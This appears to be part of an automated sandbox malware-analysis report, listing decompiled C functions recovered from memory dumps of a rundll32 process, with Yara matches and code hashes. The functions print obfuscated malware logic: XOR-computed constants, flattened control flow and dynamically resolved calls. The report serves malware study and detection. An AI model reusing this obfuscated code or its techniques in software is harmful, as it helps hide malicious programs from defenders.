                                                                      				_v36 = _v36 + 0xffffda64;
                                                                      				_v36 = _v36 ^ 0xb5bd9561;
                                                                      				_v16 = 0xf5e2;
                                                                      				_v16 = _v16 << 0xa;
                                                                      				_v16 = _v16 ^ 0xb4169af8;
                                                                      				_v16 = _v16 ^ 0xb7c16fee;
                                                                      				_v8 = 0x3ff4;
                                                                      				_v8 = _v8 + 0xed72;
                                                                      				_v8 = _v8 ^ 0x000177ac;
                                                                      				_v20 = 0x623c;
                                                                      				_v20 = _v20 * 0x56;
                                                                      				_v20 = _v20 >> 1;
                                                                      				_v20 = _v20 ^ 0x0010aba0;
                                                                      				_v4 = 0xa056;
                                                                      				_v4 = _v4 + 0x9c16;
                                                                      				_v4 = _v4 ^ 0x00012145;
                                                                      				_v12 = 0xa565;
                                                                      				_v12 = _v12 / _t111;
                                                                      				_v12 = _v12 + 0xb62d;
                                                                      				_v12 = _v12 ^ 0x0000fb40;
                                                                      				_v24 = 0x4678;
                                                                      				_v24 = _v24 + 0x5e74;
                                                                      				_v24 = _v24 ^ 0x342f7ead;
                                                                      				_v24 = _v24 | 0x89ec9c0a;
                                                                      				_v24 = _v24 ^ 0xbdefbaa2;
                                                                      				_v28 = 0x6d4f;
                                                                      				_v28 = _v28 + 0xbb4f;
                                                                      				_v28 = _v28 ^ 0x81aeaea9;
                                                                      				_t100 = _v28;
                                                                      				_t112 = 0x2b;
                                                                      				_t121 = _t100 % _t112;
                                                                      				_v28 = _t100 / _t112;
                                                                      				_v28 = _v28 ^ 0x03044831;
                                                                      				_t113 =  *0x2011090;
                                                                      				do {
                                                                      					while(_t124 != 0x1fa14ba) {
                                                                      						if(_t124 == 0x9354c13) {
                                                                      							_push(_t113);
                                                                      							_t105 = E01FFA1FE(_t113, _t121, _v16, _t113, _v8, _v20);
                                                                      							_t113 =  *0x2011090;
                                                                      							_t126 =  &(_t126[5]);
                                                                      							_t124 = 0x2ac5a631;
                                                                      							 *((intOrPtr*)(_t113 + 0x1c)) = _t105;
                                                                      							continue;
                                                                      						} else {
                                                                      							if(_t124 != 0x2ac5a631) {
                                                                      								goto L10;
                                                                      							} else {
                                                                      								_push(E02008C2B);
                                                                      								_push(_v28);
                                                                      								_push(_t113);
                                                                      								_push(_v24);
                                                                      								_push(_v12);
                                                                      								_t106 = E01FF903E(0, _v4);
                                                                      								_t113 =  *0x2011090;
                                                                      								 *((intOrPtr*)(_t113 + 0x18)) = _t106;
                                                                      							}
                                                                      						}
                                                                      						L5:
                                                                      						return 0 | _t113 != 0x00000000;
                                                                      					}
                                                                      					_push(_t113);
                                                                      					_t121 = 0x2c;
                                                                      					_t113 = E01FF54FB(_t121);
                                                                      					 *0x2011090 = _t113;
                                                                      					if(_t113 == 0) {
                                                                      						_t124 = 0x380d3f8a;
                                                                      						goto L10;
                                                                      					} else {
                                                                      						_t124 = 0x9354c13;
                                                                      						continue;
                                                                      					}
                                                                      					goto L5;
                                                                      					L10:
                                                                      				} while (_t124 != 0x380d3f8a);
                                                                      				goto L5;
                                                                      			}

                                                                      0x01ffa471
                                                                      0x01ffa442
                                                                      0x01ffa475
                                                                      0x01ffa482
                                                                      0x01ffa482
                                                                      0x01ffa4ae
                                                                      0x01ffa4b1
                                                                      0x01ffa4b8
                                                                      0x01ffa4ba
                                                                      0x01ffa4c2
                                                                      0x01ffa4cb
                                                                      0x00000000
                                                                      0x01ffa4c4
                                                                      0x01ffa4c4
                                                                      0x00000000
                                                                      0x01ffa4c4
                                                                      0x00000000
                                                                      0x01ffa4cd
                                                                      0x01ffa4cd
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: <b$Om$ed by default$r$t^
                                                                      • API String ID: 0-2037609653
                                                                      • Opcode ID: 70b655cd691629c0b6c7952b4666e3ba328f052b5338c20401b5ee6762262cf4
                                                                      • Instruction ID: 5245ce593cc3e8e5e570ad5d784fd3b3fdf1ae4e22336b4cebbf8db0d99c1a74
                                                                      • Opcode Fuzzy Hash: 70b655cd691629c0b6c7952b4666e3ba328f052b5338c20401b5ee6762262cf4
                                                                      • Instruction Fuzzy Hash: E45167B19093019FE308DF25D58981BBBE1FFC4718F404A1DF589A71A1D3BACA598F86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: <b$Om$ed by default$r$t^
                                                                      • API String ID: 0-2037609653
                                                                      • Opcode ID: ad4de06f0d9a924785fa1e6bc7105a8df5e5e7162f71bd7a00b5666e34d2a47b
                                                                      • Instruction ID: 11581cc4fb9fb238f793d458acc9caec631f21f0697394d8ee6571a9938d8c5a
                                                                      • Opcode Fuzzy Hash: ad4de06f0d9a924785fa1e6bc7105a8df5e5e7162f71bd7a00b5666e34d2a47b
                                                                      • Instruction Fuzzy Hash: 3551BCB15183019FE308DF25C58A81BBBE1FBD5718F500A1DF489661A0D3B9CE998F87
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 98%
                                                                      			E02008A33(void* __ecx, void* __edi, void* __eflags) {
                                                                      				char _v4;
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _t116;
                                                                      				signed int _t118;
                                                                      				int _t123;
                                                                      				void* _t126;
                                                                      				signed int _t127;
                                                                      				signed int _t129;
                                                                      				signed int _t134;
                                                                      				void* _t145;
                                                                      				void* _t149;
                                                                      				signed int _t151;
                                                                      
                                                                      				_v48 = 0xf279;
                                                                      				_v48 = _v48 | 0xff7f3bd7;
                                                                      				_v48 = _v48 + 0xffffb664;
                                                                      				_v48 = _v48 ^ 0xff7fb26b;
                                                                      				_v52 = 0xdfc5;
                                                                      				_v52 = _v52 | 0x672e76b1;
                                                                      				_v52 = _v52 >> 6;
                                                                      				_v52 = _v52 << 0xe;
                                                                      				_v52 = _v52 ^ 0x2effc010;
                                                                      				_v28 = 0x717b;
                                                                      				_t149 = __ecx;
                                                                      				_v28 = _v28 * 0x13;
                                                                      				_t129 = 0x2b;
                                                                      				_v28 = _v28 * 0x77;
                                                                      				_v28 = _v28 ^ 0x03ea435f;
                                                                      				_v16 = 0x5e90;
                                                                      				_v16 = _v16 + 0x8fca;
                                                                      				_v16 = _v16 ^ 0x0000ee4a;
                                                                      				_v20 = 0x9c59;
                                                                      				_v20 = _v20 ^ 0x54a83331;
                                                                      				_v20 = _v20 ^ 0x54a8d08f;
                                                                      				_v36 = 0x2be7;
                                                                      				_v36 = _v36 | 0xf6bdff7f;
                                                                      				_v36 = _v36 ^ 0xf6bda7e3;
                                                                      				_v32 = 0x6479;
                                                                      				_v32 = _v32 << 6;
                                                                      				_v32 = _v32 * 0x13;
                                                                      				_v32 = _v32 ^ 0x01dd2cd3;
                                                                      				_v40 = 0x51fb;
                                                                      				_v40 = _v40 + 0x7aab;
                                                                      				_v40 = _v40 + 0xd6ea;
                                                                      				_v40 = _v40 + 0xc8ce;
                                                                      				_v40 = _v40 ^ 0x000230c3;
                                                                      				_v8 = 0x432;
                                                                      				_v8 = _v8 * 0x5a;
                                                                      				_v8 = _v8 ^ 0x000148ae;
                                                                      				_v24 = 0xb7c8;
                                                                      				_v24 = _v24 * 0x18;
                                                                      				_v24 = _v24 << 0xf;
                                                                      				_v24 = _v24 ^ 0x9d6067a0;
                                                                      				_v12 = 0x7924;
                                                                      				_t59 =  &_v12; // 0x7924
                                                                      				_v12 =  *_t59 / _t129;
                                                                      				_v12 = _v12 ^ 0x0000718b;
                                                                      				_v44 = 0x1703;
                                                                      				_v44 = _v44 >> 9;
                                                                      				_v44 = _v44 ^ 0x24440fa6;
                                                                      				_v44 = _v44 << 2;
                                                                      				_v44 = _v44 ^ 0x91103eb4;
                                                                      				_v4 = E01FFA156();
                                                                      				_t126 = _v48 + E01FFA156() % _v52;
                                                                      				_t116 = E01FFA156();
                                                                      				_t118 = _v44;
                                                                      				_t151 = _v28 + _t116 % _v16;
                                                                      				if(_t118 < _t126) {
                                                                      					_t127 = _t126 - _t118;
                                                                      					_t145 = _t149;
                                                                      					_t134 = _t127 >> 1;
                                                                      					_t123 = memset(_t145, 0x2d002d, _t134 << 2);
                                                                      					asm("adc ecx, ecx");
                                                                      					_t149 = _t149 + _t127 * 2;
                                                                      					memset(_t145 + _t134, _t123, 0);
                                                                      				}
                                                                      				E0200087B(_t149, _v40, _v8, _t151, _v24, 3,  &_v4, _v12);
                                                                      				 *((short*)(_t149 + _t151 * 2)) = 0;
                                                                      				return 0;
                                                                      			}



























                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $yJ$J$yd${q$+
                                                                      • API String ID: 0-1056812311
                                                                      • Opcode ID: 3545f23447534342cf5752ecb078e1970462ca806c9444e73ab66d17d88e5b64
                                                                      • Instruction ID: 4d377557e5ccc289689a5ba032741cc34416f7915d9cf1ceba3576c290483e89
                                                                      • Opcode Fuzzy Hash: 3545f23447534342cf5752ecb078e1970462ca806c9444e73ab66d17d88e5b64
                                                                      • Instruction Fuzzy Hash: 6851017050D341AFD348DF24D98941BFBE1BBC8B48F50991DF0DA962A0C3B59A59CF86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $yJ$J$yd${q$+
                                                                      • API String ID: 0-1056812311
                                                                      • Opcode ID: 3545f23447534342cf5752ecb078e1970462ca806c9444e73ab66d17d88e5b64
                                                                      • Instruction ID: 7d308a0948d164d9816890152242fc119d2201f841fc781d7653d5a199b9902a
                                                                      • Opcode Fuzzy Hash: 3545f23447534342cf5752ecb078e1970462ca806c9444e73ab66d17d88e5b64
                                                                      • Instruction Fuzzy Hash: AD51F1B050D341ABD348DF25D98941BFBE1FBC8B48F50991DF0CA962A1C3B49A59CF86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E01FFFFBA(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				signed int _v64;
                                                                      				intOrPtr _v68;
                                                                      				char _v588;
                                                                      				void* _t119;
                                                                      				signed int _t127;
                                                                      
                                                                      				_v64 = _v64 & 0x00000000;
                                                                      				_v60 = _v60 & 0x00000000;
                                                                      				_v68 = 0x26646a;
                                                                      				_v36 = 0x19d7;
                                                                      				_v36 = _v36 ^ 0x575cc756;
                                                                      				_v36 = _v36 ^ 0x575cd0df;
                                                                      				_v12 = 0x27d2;
                                                                      				_t127 = 0x61;
                                                                      				_v12 = _v12 / _t127;
                                                                      				_v12 = _v12 ^ 0x9e7a6cb1;
                                                                      				_v12 = _v12 + 0x91e2;
                                                                      				_v12 = _v12 ^ 0x9e7ab2a5;
                                                                      				_v24 = 0x1208;
                                                                      				_v24 = _v24 << 8;
                                                                      				_v24 = _v24 + 0xff06;
                                                                      				_v24 = _v24 ^ 0x00133f87;
                                                                      				_v56 = 0x4c40;
                                                                      				_v56 = _v56 + 0xffffbb62;
                                                                      				_v56 = _v56 ^ 0x00002706;
                                                                      				_v44 = 0x6bda;
                                                                      				_v44 = _v44 | 0x742987e1;
                                                                      				_v44 = _v44 ^ 0x7429f52a;
                                                                      				_v28 = 0x57ee;
                                                                      				_v28 = _v28 >> 1;
                                                                      				_v28 = _v28 >> 0xc;
                                                                      				_v28 = _v28 ^ 0x00003c46;
                                                                      				_v52 = 0x4743;
                                                                      				_v52 = _v52 >> 0x10;
                                                                      				_v52 = _v52 ^ 0x00003729;
                                                                      				_v16 = 0xad1b;
                                                                      				_v16 = _v16 << 3;
                                                                      				_v16 = _v16 >> 0xa;
                                                                      				_v16 = _v16 | 0xb72f12c0;
                                                                      				_v16 = _v16 ^ 0xb72f244f;
                                                                      				_v32 = 0x1354;
                                                                      				_v32 = _v32 >> 0xe;
                                                                      				_v32 = _v32 << 0xc;
                                                                      				_v32 = _v32 ^ 0x00006891;
                                                                      				_v20 = 0xf00c;
                                                                      				_v20 = _v20 >> 0x10;
                                                                      				_v20 = _v20 << 0xa;
                                                                      				_v20 = _v20 << 9;
                                                                      				_v20 = _v20 ^ 0x00003ff0;
                                                                      				_v8 = 0xa5dc;
                                                                      				_v8 = _v8 ^ 0x3adce6d7;
                                                                      				_v8 = _v8 | 0x37424e68;
                                                                      				_t83 =  &_v8; // 0x37424e68
                                                                      				_v8 =  *_t83 * 0x24;
                                                                      				_v8 = _v8 ^ 0xfb433705;
                                                                      				_v48 = 0xf651;
                                                                      				_v48 = _v48 << 0xf;
                                                                      				_v48 = _v48 ^ 0x7b288bd6;
                                                                      				_v40 = 0xf298;
                                                                      				_v40 = _v40 * 0x22;
                                                                      				_v40 = _v40 ^ 0x002053ff;
                                                                      				_t119 = E01FFBDCC( *0x2011088 + 0x38, _v36, _v12, _v24);
                                                                      				_t140 = _a4 + 0x2c;
                                                                      				if(E01FF7F4B(_t119, _v56, _a4 + 0x2c, _v44, _v28) != 0) {
                                                                      					E01FF35FC(_t140, _v52, _v16, _v32,  &_v588, _v20, _a8);
                                                                      					E01FFEB1E(_v8, _v48, _v40,  &_v588);
                                                                      				}
                                                                      				return 1;
                                                                      			}























                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcmpi
                                                                      • String ID: )7$@L$F<$hNB7$jd&
                                                                      • API String ID: 1586166983-2568215416
                                                                      • Opcode ID: 22006df91b3913bc911f7c656553d31beda62e5a5497648d07f23e78c7d83ceb
                                                                      • Instruction ID: 2920f2ecb5f2d29d8b2b2fd38133ddaf8bd313a6662fc309de3f33fd842d164d
                                                                      • Opcode Fuzzy Hash: 22006df91b3913bc911f7c656553d31beda62e5a5497648d07f23e78c7d83ceb
                                                                      • Instruction Fuzzy Hash: 2E5110B1C0121EABDF49DFE0D94A4EEBBB1FF04308F208198D511B62A1D7B90A59CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )7$@L$F<$hNB7$jd&
                                                                      • API String ID: 0-2568215416
                                                                      • Opcode ID: b4b52c6208338e16752ea4720bab2c9fa768a7bfbcf583c7884f87e0b6c5c6b7
                                                                      • Instruction ID: f2d360ad16153a201f114358e8a18588ec1ef155b056c8ef092b57420198dba8
                                                                      • Opcode Fuzzy Hash: b4b52c6208338e16752ea4720bab2c9fa768a7bfbcf583c7884f87e0b6c5c6b7
                                                                      • Instruction Fuzzy Hash: B3511FB1D0021EEBDF59DFE0D94A4EEBBB1FB04308F208198D411B62A1D7B94A59CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 64%
                                                                      			E01FFF369(intOrPtr _a4) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				intOrPtr _v44;
                                                                      				void* _t76;
                                                                      				void* _t78;
                                                                      				intOrPtr* _t79;
                                                                      				signed int _t82;
                                                                      				intOrPtr _t93;
                                                                      
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				_v44 = 0x596980;
                                                                      				_v16 = 0xc974;
                                                                      				_t82 = 0xd;
                                                                      				_t93 = _a4;
                                                                      				_v16 = _v16 * 0x36;
                                                                      				_v16 = _v16 ^ 0xaf6efdbb;
                                                                      				_v16 = _v16 ^ 0xaf44ac5b;
                                                                      				_v28 = 0x3fde;
                                                                      				_v28 = _v28 + 0x4220;
                                                                      				_v28 = _v28 ^ 0x00009a54;
                                                                      				_v12 = 0x436a;
                                                                      				_v12 = _v12 + 0x6671;
                                                                      				_v12 = _v12 >> 0xe;
                                                                      				_v12 = _v12 ^ 0x000031a0;
                                                                      				_v32 = 0x47a5;
                                                                      				_v32 = _v32 + 0x143f;
                                                                      				_v32 = _v32 ^ 0x0000673a;
                                                                      				_v8 = 0x9f04;
                                                                      				_v8 = _v8 >> 2;
                                                                      				_v8 = _v8 + 0xffffba35;
                                                                      				_v8 = _v8 >> 0x10;
                                                                      				_v8 = _v8 ^ 0x00009ed5;
                                                                      				_v36 = 0x79e2;
                                                                      				_v36 = _v36 >> 2;
                                                                      				_v36 = _v36 ^ 0x000012a7;
                                                                      				_v24 = 0x1d1a;
                                                                      				_v24 = _v24 / _t82;
                                                                      				_v24 = _v24 + 0xffff8b37;
                                                                      				_v24 = _v24 ^ 0xfffff957;
                                                                      				_v20 = 0x427c;
                                                                      				_v20 = _v20 ^ 0xbd8b340b;
                                                                      				_v20 = _v20 * 0x3e;
                                                                      				_v20 = _v20 ^ 0xe7c6e2bc;
                                                                      				_t76 =  *((intOrPtr*)(_t93 + 0x18))( *((intOrPtr*)(_t93 + 8)), 1, 0);
                                                                      				_t99 = _t76;
                                                                      				if(_t76 != 0) {
                                                                      					_push(0x1ff1050);
                                                                      					_push(_v12);
                                                                      					_t78 = E0200CF31(_v16, _v28, _t99);
                                                                      					_push(_v8);
                                                                      					_t95 = _t78;
                                                                      					_push( *((intOrPtr*)(_t93 + 8)));
                                                                      					_t79 = E01FF3938(_t78, _v32);
                                                                      					if(_t79 != 0) {
                                                                      						 *_t79();
                                                                      					}
                                                                      					E02000D6D(_v36, _v24, _v20, _t95);
                                                                      				}
                                                                      				return 0;
                                                                      			}



















                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: B$:g$qf$|B$y
                                                                      • API String ID: 0-887352362
                                                                      • Opcode ID: d3426b5b804950b95c71475040bf1b6f6b44bbab9cf34ffc18f294c90bbd528d
                                                                      • Instruction ID: 1eda526a54c82d96170707c00a0cd97c6feea398802b975fb577529a61723bb8
                                                                      • Opcode Fuzzy Hash: d3426b5b804950b95c71475040bf1b6f6b44bbab9cf34ffc18f294c90bbd528d
                                                                      • Instruction Fuzzy Hash: 513122B1E0130AABEF14DFA1C94A5EEBBB2FF54314F208149D510B62A0D7BA5B45CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: B$:g$qf$|B$y
                                                                      • API String ID: 0-887352362
                                                                      • Opcode ID: 77dc1029f57f1d7a60eec0434573420ba6cd3ecc3b8d4ff41192ce59331574d0
                                                                      • Instruction ID: d6dc174d198889dfe868dca4a160ae7c1581ac4e49af573d4568e7a291df237c
                                                                      • Opcode Fuzzy Hash: 77dc1029f57f1d7a60eec0434573420ba6cd3ecc3b8d4ff41192ce59331574d0
                                                                      • Instruction Fuzzy Hash: 813133B1D0120AEBEF08DFA1C94A5EEBBB1FB54314F208149D510B62A0D7B95B55CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 96%
                                                                      			E01FFD2DD() {
                                                                      				char _v520;
                                                                      				char _v1040;
                                                                      				intOrPtr _v1044;
                                                                      				intOrPtr _v1048;
                                                                      				intOrPtr _v1052;
                                                                      				intOrPtr _v1056;
                                                                      				signed int _v1060;
                                                                      				signed int _v1064;
                                                                      				signed int _v1068;
                                                                      				signed int _v1072;
                                                                      				signed int _v1076;
                                                                      				signed int _v1080;
                                                                      				signed int _v1084;
                                                                      				signed int _v1088;
                                                                      				signed int _v1092;
                                                                      				signed int _v1096;
                                                                      				signed int _v1100;
                                                                      				signed int _v1104;
                                                                      				signed int _v1108;
                                                                      				signed int _v1112;
                                                                      				signed int _v1116;
                                                                      				signed int _v1120;
                                                                      				signed int _v1124;
                                                                      				signed int _v1128;
                                                                      				signed int _v1132;
                                                                      				signed int _v1136;
                                                                      				signed int _v1140;
                                                                      				signed int _v1144;
                                                                      				void* _t206;
                                                                      				void* _t210;
                                                                      				void* _t217;
                                                                      				intOrPtr _t238;
                                                                      				signed int _t239;
                                                                      				signed int _t240;
                                                                      				signed int _t241;
                                                                      				signed int* _t244;
                                                                      
                                                                      				_t244 =  &_v1144;
                                                                      				_v1056 = 0x1aa15c;
                                                                      				_v1052 = 0x4d0cb0;
                                                                      				_t217 = 0xcdcbb46;
                                                                      				_v1048 = 0xec305;
                                                                      				_t238 = 0;
                                                                      				_v1044 = 0;
                                                                      				_v1080 = 0xf4ee;
                                                                      				_t239 = 0x37;
                                                                      				_v1080 = _v1080 / _t239;
                                                                      				_v1080 = _v1080 ^ 0x00001f1a;
                                                                      				_v1136 = 0x65d1;
                                                                      				_v1136 = _v1136 >> 7;
                                                                      				_v1136 = _v1136 >> 3;
                                                                      				_v1136 = _v1136 | 0xb1d65351;
                                                                      				_v1136 = _v1136 ^ 0xb1d66160;
                                                                      				_v1092 = 0x9227;
                                                                      				_v1092 = _v1092 ^ 0xf0d4d9ed;
                                                                      				_v1092 = _v1092 >> 6;
                                                                      				_v1092 = _v1092 ^ 0x03c34d93;
                                                                      				_v1064 = 0x7d06;
                                                                      				_v1064 = _v1064 | 0x78b1f3a9;
                                                                      				_v1064 = _v1064 ^ 0x78b19bbc;
                                                                      				_v1076 = 0x3a45;
                                                                      				_v1076 = _v1076 ^ 0x8b32e14f;
                                                                      				_v1076 = _v1076 ^ 0x8b32a728;
                                                                      				_v1084 = 0x40e7;
                                                                      				_v1084 = _v1084 >> 0xf;
                                                                      				_v1084 = _v1084 ^ 0x000056c5;
                                                                      				_v1140 = 0x14b6;
                                                                      				_v1140 = _v1140 + 0x82db;
                                                                      				_v1140 = _v1140 + 0xffff6955;
                                                                      				_v1140 = _v1140 | 0xc7e9aa62;
                                                                      				_v1140 = _v1140 ^ 0xc7e9d185;
                                                                      				_v1068 = 0xe08d;
                                                                      				_v1068 = _v1068 ^ 0x0cc611ab;
                                                                      				_v1068 = _v1068 ^ 0x0cc6d2cf;
                                                                      				_v1108 = 0x428e;
                                                                      				_v1108 = _v1108 ^ 0x2aea69d2;
                                                                      				_v1108 = _v1108 * 0x68;
                                                                      				_v1108 = _v1108 ^ 0x6f218659;
                                                                      				_v1100 = 0x24cb;
                                                                      				_v1100 = _v1100 ^ 0x57e30eba;
                                                                      				_v1100 = _v1100 << 0xe;
                                                                      				_v1100 = _v1100 ^ 0xca9c0614;
                                                                      				_v1116 = 0x3dd7;
                                                                      				_v1116 = _v1116 + 0x57d7;
                                                                      				_v1116 = _v1116 * 0x14;
                                                                      				_v1116 = _v1116 ^ 0x000bfaaf;
                                                                      				_v1104 = 0x5f98;
                                                                      				_v1104 = _v1104 | 0xb14dd167;
                                                                      				_v1104 = _v1104 ^ 0x023b643c;
                                                                      				_v1104 = _v1104 ^ 0xb376dba6;
                                                                      				_v1144 = 0x61d9;
                                                                      				_v1144 = _v1144 + 0x900;
                                                                      				_v1144 = _v1144 + 0x298f;
                                                                      				_v1144 = _v1144 + 0x5e62;
                                                                      				_v1144 = _v1144 ^ 0x0000cef3;
                                                                      				_v1132 = 0xb8f7;
                                                                      				_v1132 = _v1132 >> 0xa;
                                                                      				_v1132 = _v1132 << 0xc;
                                                                      				_v1132 = _v1132 | 0x7a068a91;
                                                                      				_v1132 = _v1132 ^ 0x7a06e880;
                                                                      				_v1060 = 0xb6ca;
                                                                      				_v1060 = _v1060 | 0x34ba312c;
                                                                      				_v1060 = _v1060 ^ 0x34bab1b7;
                                                                      				_v1112 = 0x7535;
                                                                      				_v1112 = _v1112 ^ 0xf4f555d1;
                                                                      				_v1112 = _v1112 + 0x341f;
                                                                      				_v1112 = _v1112 ^ 0xf4f507bd;
                                                                      				_v1120 = 0xf80;
                                                                      				_v1120 = _v1120 + 0xd656;
                                                                      				_v1120 = _v1120 ^ 0x1fb6d00a;
                                                                      				_v1120 = _v1120 ^ 0x1fb65e63;
                                                                      				_v1128 = 0xca3d;
                                                                      				_t240 = 0x4b;
                                                                      				_v1128 = _v1128 * 0xa;
                                                                      				_v1128 = _v1128 << 1;
                                                                      				_v1128 = _v1128 << 9;
                                                                      				_v1128 = _v1128 ^ 0x1f99ed7d;
                                                                      				_v1088 = 0xf1f3;
                                                                      				_v1088 = _v1088 + 0x83;
                                                                      				_v1088 = _v1088 << 0xf;
                                                                      				_v1088 = _v1088 ^ 0x793b4332;
                                                                      				_v1072 = 0xc19e;
                                                                      				_v1072 = _v1072 / _t240;
                                                                      				_v1072 = _v1072 ^ 0x00000807;
                                                                      				_v1096 = 0x5df5;
                                                                      				_t241 = 0x65;
                                                                      				_v1096 = _v1096 / _t241;
                                                                      				_v1096 = _v1096 + 0xb24c;
                                                                      				_v1096 = _v1096 ^ 0x0000928e;
                                                                      				_v1124 = 0x49f0;
                                                                      				_v1124 = _v1124 + 0x7719;
                                                                      				_v1124 = _v1124 << 0xb;
                                                                      				_v1124 = _v1124 ^ 0x0608131f;
                                                                      				do {
                                                                      					while(_t217 != 0xcdcbb46) {
                                                                      						if(_t217 == 0xe5d9d0e) {
                                                                      							_t206 = E0200CBE7( &_v520, _v1112, __eflags, _v1120, _v1128,  &_v1040);
                                                                      							_t244 =  &(_t244[3]);
                                                                      							__eflags = _t206;
                                                                      							_t238 =  !=  ? 1 : _t238;
                                                                      							_t217 = 0x23d64a19;
                                                                      							continue;
                                                                      						} else {
                                                                      							if(_t217 == 0xe97c3dd) {
                                                                      								_push(_t217);
                                                                      								E01FFDFD8(_v1080,  &_v520, __eflags, _v1136, _v1092);
                                                                      								_t244 =  &(_t244[3]);
                                                                      								_t217 = 0x3342c16f;
                                                                      								continue;
                                                                      							} else {
                                                                      								if(_t217 == 0x23d64a19) {
                                                                      									E020047B5(_v1088,  &_v1040, _v1072, _v1096, _v1124);
                                                                      								} else {
                                                                      									_t251 = _t217 - 0x3342c16f;
                                                                      									if(_t217 != 0x3342c16f) {
                                                                      										goto L10;
                                                                      									} else {
                                                                      										_push(0x1ff12d8);
                                                                      										_push(_v1140);
                                                                      										_push(_v1084);
                                                                      										_t210 = E01FF5DFC(_v1064, _v1076, _t251);
                                                                      										_t175 =  &_v1116; // 0x793b4332
                                                                      										E01FFA4D7(_t251, _v1108, _v1100,  *_t175, _v1104, _t210,  *0x2011088 + 0x254,  &_v1040,  *0x2011088 + 0x38);
                                                                      										E02000D6D(_v1144, _v1132, _v1060, _t210);
